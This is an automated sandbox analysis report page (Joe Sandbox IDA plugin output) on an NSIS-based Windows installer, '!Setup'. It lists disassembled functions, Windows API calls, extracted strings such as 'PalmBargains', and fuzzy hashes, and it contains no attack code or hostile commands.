SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
GetDlgItem.USER32(?,?), ref: 0040554F
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
IsWindowEnabled.USER32(00000000), ref: 0040556A
GetDlgItem.USER32(?,00000001), ref: 00405619
GetDlgItem.USER32(?,00000002), ref: 00405623
SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
GetDlgItem.USER32(?,00000003), ref: 00405734
ShowWindow.USER32(00000000,?), ref: 00405756
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
EnableWindow.USER32(?,?), ref: 00405783
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
EnableMenuItem.USER32(00000000), ref: 004057A0
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
SetWindowTextW.USER32(?,00451D98), ref: 00405808
ShowWindow.USER32(?,0000000A), ref: 0040593C

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
RegisterClassW.USER32(00476A40), ref: 00405B36
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87

Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C

ShowWindow.USER32(00000005,00000000), ref: 00405BBD
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
RegisterClassW.USER32(00476A40), ref: 00405BFF
DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E

Strings

RichEdit20A, xrefs: 00405BE2, 00405BE7
@jG, xrefs: 00405AF2
Control Panel\Desktop\ResourceLocale, xrefs: 0040599E
"F, xrefs: 00405A4B
F, xrefs: 00405A22
.exe, xrefs: 00405A69
RichEdit, xrefs: 00405BF0
RichEd20, xrefs: 00405BC9
RichEd32, xrefs: 00405BD4
.DEFAULT\Control Panel\International, xrefs: 004059C5
_Nb, xrefs: 00405AFD

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-2746725676
Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

lstrcatW.KERNEL32(00000000,00000000,PalmBargains,004D70B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,PalmBargains,PalmBargains,00000000,00000000,PalmBargains,004D70B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427D79,759223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427D79,759223A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427D79,759223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Strings

PalmBargains, xrefs: 00401A53, 00401A5C, 00401A69, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: error, user abort, xrefs: 00401B53
File: wrote %d to "%s", xrefs: 00401BD0
File: error creating "%s", xrefs: 00401AF0
File: error, user retry, xrefs: 00401B40
File: error, user cancel, xrefs: 00401B93

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$PalmBargains
API String ID: 4286501637-1097205218
Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Function 0040337F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 175
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033F1
GetTickCount.KERNEL32 ref: 00403492
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
wsprintfW.USER32 ref: 004034CE
WriteFile.KERNELBASE(00000000,00000000,00427D79,00403792,00000000), ref: 004034FF
WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597

Strings

(]C, xrefs: 004033FD
y=B, xrefs: 00403458, 0040346A
pAB, xrefs: 004033AB
... %d%%, xrefs: 004034C8
y}B, xrefs: 0040346F, 0040348A, 00403513

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: (]C$... %d%%$pAB$y=B$y}B
API String ID: 651206458-1939203292
Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004035C4
GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C

Strings

Inst, xrefs: 00403698
Null, xrefs: 004036AA
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
Error launching installer, xrefs: 00403603
soft, xrefs: 004036A1

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(00445D80,00427D79,759223A0,00000000), ref: 00404FD6
lstrlenW.KERNEL32(004034E5,00445D80,00427D79,759223A0,00000000), ref: 00404FE6
lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427D79,759223A0,00000000), ref: 00404FF9
SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427D79,759223A0,00000000), ref: 00406902

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

PalmBargains, xrefs: 00402770
<RM>, xrefs: 00402713
WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$PalmBargains$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-4007490633
Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427D79,759223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427D79,759223A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427D79,759223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405EC9
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4

Strings

nsa, xrefs: 00405EB8

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C

Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

